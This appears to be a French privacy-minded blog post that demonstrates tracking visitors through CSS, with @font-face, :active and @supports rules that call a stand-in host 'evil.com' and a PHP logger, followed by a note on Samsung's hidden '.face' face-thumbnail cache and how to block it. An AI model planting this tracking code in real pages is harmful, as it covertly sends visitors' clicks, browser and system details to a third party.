Holy Fuck...
C'est pas con du tout: pister les clicks des visiteurs via css:

 #link:active::after {

    content: url("https://evil.com/track?action=link_clicked");

}

Et hop, côté serveur, tu récupères tout bien comme tu veux.

session_start();



// Prints the time that the script ran

print("Timestamp: " . time());



// Prints the action specified by the action parameter (in this case, "link_clicked")

print("Action: " . $_REQUEST['action']);



// Prints the user's IP address

print("IP Address: " . $_SERVER['REMOTE_ADDR']);



// Prints the user's browser agent

print("User Agent: " . $_SERVER['HTTP_USER_AGENT']);

?>

Et c'est pas tout !

On peut détecter le navigateur:

 @supports (-webkit-appearance:none) and (not (-ms-ime-align:auto)){

    #chrome_detect::after {

        content: url("https://evil.com/track?action=browser_chrome");

    }

}

ou même l'OS:

// stylesheet.css

@font-face {

    font-family: Font1;

    src: url("https://evil.com/track?action=font1");

}



#font_detection {

    font-family: Calibri, Font1;

}



<!-- page.html -->

<div id="font_detection">test</div>

copie-collage

Sur beaucoup de téléphones récents, les applications vous proposent de "taguer" les visages des amis (Facebook, Google+). Certains fabricants (comme Samsung) propose également cela dans leur galerie photo, et incluent souvent aussi la possibilité de déverrouiller votre téléphone avec votre visage, ou encore de temporiser le verrouillage automatique de l'écran s'il l'appareil détecte votre visage en train de regarder l'écran (fonction SmartStay).

Pour cela, la plupart de ces applications utilisent un répertoire-cache contenant des miniatures des visages. Regardez donc à la racine du stockage de votre téléphone (pas sur la carte SD) si vous n'auriez pas un répertoire ".face": Ces fichiers sans extensions (d'environ 7 ko) sont en fait des .jpg. (Il vous suffit de les renommer en .jpg pour voir le contenu.)

A titre d'exemple, sur les téléphones Samsung, quelques minutes après avoir pris une photo (ou l'avoir simplement téléchargée d'internet), le téléphone va détecter les visages et en faire une copie dans ce répertoire. (Constaté sur un Samsung Galaxy S5 neo sous Android 6.0.1)

Là où ça deviant glauque, c'est que non seulement on ne sait pas trop ce qu'en font ces applications, mais même en les désactivant toutes (Déverrouillage par visage, fonction SmartStay, désactivation de la gallerie Samsung....) ces foutus fichiers continuent être créés. ((

Solution bourrin:

• supprimez le répertoire ".face"
  
• copier un fichier non vide à la racine et renommez-le en ".face"
  
  Et voilà, le système ne pourra plus créer ce répertoire.
  
  J'aurais aimé trouver une réponse officielle de Samsung (ou autre) sur ce répertoire... mais rien.
  Est-ce que les informations de détection des visages quittent votre téléphone ? Je n'en sais rien.
  Tout cela est probablement lié à l'API de détection des visage de Google: https://developer.android.com/reference/android/media/FaceDetector.html
  
  Mainenant étant donné que Google a aussi accès à votre position géographique (dès le moment où GoogleMaps est installé sur votre téléphone, et même si vous ne l'utilisez pas), cela veut dire qu'ils sont capables de constituer une grosse base de données indiquant QUI était OÙ et QUAND. Tout cela de manière totalement automatisée, à partir du simple moment où vous appairaissez une photos, même en arrière-plan.
  Je ne dis pas qu'ils le font, mais qu'ils ont tout ce qu'il faut pour le faire.
  
  
  Source image